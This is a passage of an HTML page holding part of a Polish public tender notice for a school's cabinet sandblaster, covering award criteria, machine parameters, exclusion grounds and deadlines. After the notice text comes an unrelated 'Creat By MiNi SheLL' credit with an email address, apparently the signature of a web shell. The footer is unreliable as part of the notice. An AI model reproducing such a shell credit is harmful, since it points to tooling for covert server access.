rekojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">36,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">4,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III Piaskarka kabinowa<br/><br/>Dostawa obejmuje piaskarkę kabinową. Wykonawca zobowiązany będzie do dostawy urządzenia wraz z kompletem instrukcji obsługi, montażu w warsztatach szkolnych, urządzenie zostanie uruchomione na warsztatach szklonych przez dostawce urządzenia oraz przeprowadzenia szkolenia stanowiskowego w wymiarze 2 godz. lekcyjnych dla 4 nauczycieli. Okres gwarancji wynosi min. 24 miesiące.<br/><br/>Parametry urządzenia:<br/>1.	Wymiary komory roboczej min.od 850 do 950mm x od 1325 do 1475mm x od 665 do735 mm<br/>2.	W pełni ogumowna i oświetlona komora robocza<br/>3.	Dodatkowe drzwiczki umożliwiające piaskowanie elementów przelotowo<br/>4.	Sterowanie pneumatyczne<br/>5.	Panel sterowniczy umieszczony nad głową operatora<br/>6.	Wibrator wspomagający zsyp kruszywa<br/>7.	Zasilanie 230 V<br/>8.	Wbudowany odpylacz z pneumatycznym systemem czyszczenia<br/>9.	System pracy ciśnieniowej<br/>10.	Urządzenie fabrycznie posiada licznik pracy umożliwiający pomiar czasu piaskowania poszczególnych elementów<br/>11.	Zbiornik ciśnieniowy grubościenny i testowany przy ciśnieniu 14 bar wraz z urządzeniem dostarczony atest <br/>12.	Pojemność zbiornika: 0d 720l do 880l<br/>13.	Waga urządzenia: od 560kg do 630kg <br/>Pozostałe warunki dostawy<br/>Produkt dostarczony do szkoły ZSCKR Potoczek jako fabrycznie nowy </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 29349,59 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42924200-1 - Maszyny do czyszczenia parą i piaskowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty w każdej części zamówienia zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem: <br/>1)	cena ofertowa (brutto) – waga kryterium 60pkt<br/>2)	okres gwarancji i rękojmi– waga kryterium 36 pkt<br/>3)	kryterium społeczne – waga kryterium 4 pkt<br/><br/>Punkty będą przyznawane według poniższej zasady:<br/><br/>1.	Kryterium ceny oceniane będzie według wzoru:<br/><br/> Cn.<br/>P1 = -------------- x 60 pkt<br/> Cb<br/><br/>gdzie:<br/>P1- ilość punktów w kryterium cena<br/>Cn	– najniższa cena,<br/>Cb	– cena oferty badanej,<br/>60	pkt –znaczenie kryterium ceny.<br/><br/>2.	Kryterium okresu gwarancji i rękojmi na obie maszyny oceniane będzie następująco:<br/><br/>Minimalny okres gwarancji i rękojmi za wady obejmuje wszystkie elementy i podzespoły wymienione w specyfikacji poszczególnych maszyn i wynosi 24 miesiące od daty odbioru przedmiotu umowy. <br/>Zaoferowanie gwarancji i rękojmi na okres krótszy niż 24 m-ce skutkowało będzie odrzuceniem oferty. <br/> Oferta, w której zadeklarowany zostanie okres gwarancji i rękojmi w liczbie 24 miesiące otrzyma 0 pkt.<br/>Oferta, w której zadeklarowany zostanie okres gwarancji i rękojmi w liczbie 36 miesięcy i więcej otrzyma 36 pkt. <br/>Oferta, w której zadeklarowany zostanie okres gwarancji i rękojmi w liczbie powyżej 24 miesięcy, otrzyma punkty obliczone wg następujących zasad: każdy dodatkowy miesiąc to 3 pkt, ale łącznie nie więcej niż 36 pkt. <br/><br/>3.	Kryterium społeczne – 4 pkt tj. Wykonawca mający status zakładu pracy chronionej, spółdzielnia socjalna oraz inny wykonawca, którego głównym celem lub głównym celem działalności jego wyodrębnionej organizacyjnie jednostki, która będzie realizowała zamówienie, jest społeczna i zawodowa integracja osób społecznie marginalizowanych, pod warunkiem, że procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których ppkt 1–10, jest nie mniejszy niż 30% osób zatrudnionych u wykonawcy albo w jego jednostce, która będzie realizowała zamówienie. Wartość procentowego wskaźnika ustala się w odniesieniu do ogólnego zatrudnienia w tym podmiocie osób społecznie marginalizowanych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji rekojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">36,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">4,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o niepodleganiu wykluczeniu potwierdzające brak podstaw wykluczenia na dzień składania ofert w zakresie art. 108<br/>ust. 1 i art. 109 ust. 1 pkt 4 Pzp oraz art. 7 ust. 1 ustawy o szczególnych rozwiązaniach – zawarte w druku OFERTA.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie<br/>wskazanym przez Zamawiającego w SWZ potwierdzające<br/>spełnianie warunków udziału w postępowaniu na dzień składania ofert – zawarte w druku OFERTA</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty wspólnej przez kilku wykonawców, każdy z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia musi złożyć dokumenty i oświadczenia wskazane w Rozdziale VIII pkt 2. Pozostałe dokumenty będą<br/>traktowane jako wspólne.<br/>4.2 Wykonawcy ubiegający się wspólnie o udzielenie zamówienia muszą ustanowić pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do OFERTY należy<br/>dołączyć stosowne pełnomocnictwo w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym przez osobę lub osoby upoważnione do składania oświadczeń woli każdego z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>4.3 Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za niewykonanie lub<br/>nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego.<br/>4.4 Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>4.5 W formularzu OFERTA w miejscu „nazwa i adres wykonawcy” należy wpisać dane dotyczące wszystkich podmiotów<br/>wspólnie ubiegających się o udzielenie zamówienie, a nie tylko pełnomocnika.<br/>4.6 Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia kluczowych zadań.<br/>4.7 Przed podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została<br/>wybrana Zamawiający będzie żądać umowy regulującej ich współpracę.<br/>6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na<br/>sfinansowanie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmiany Umowy w następujących przypadkach:<br/>a) w zakresie przedmiotu zamówienia, jeżeli zmiany są korzystne dla Zamawiającego albo zaszły okoliczności, których nie<br/>można było przewidzieć w chwili zawarcia umowy, w szczególności siła wyższa lub inne niemożliwe do przewidzenia okoliczności towarzyszące realizacji dostawy, nie leżące po stronie Wykonawcy,<br/>b) w zakresie terminu realizacji, jeżeli zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, nie<br/>leżące po stronie Wykonawcy, a zmiana jest konieczna dla należytego wykonania umowy,<br/>c) w zakresie wynagrodzenia w przypadku ustawowej zmiany stawek podatku od towarów i usług. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy wykonawcę z postępowania na podstawie art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego, w przypadku wystąpienia którejkolwiek z określonych w niej przesłanek :<br/>- wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na<br/>podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o<br/>szczególnych rozwiązaniach;<br/>- którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz<br/>finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124, 1285, 1723 i 1843) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od<br/>dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach;<br/>- którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U.<br/>z 2023 r. poz. 120, 295 i 1598) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach.

Creat By MiNi SheLL
Email: jattceo@gmail.com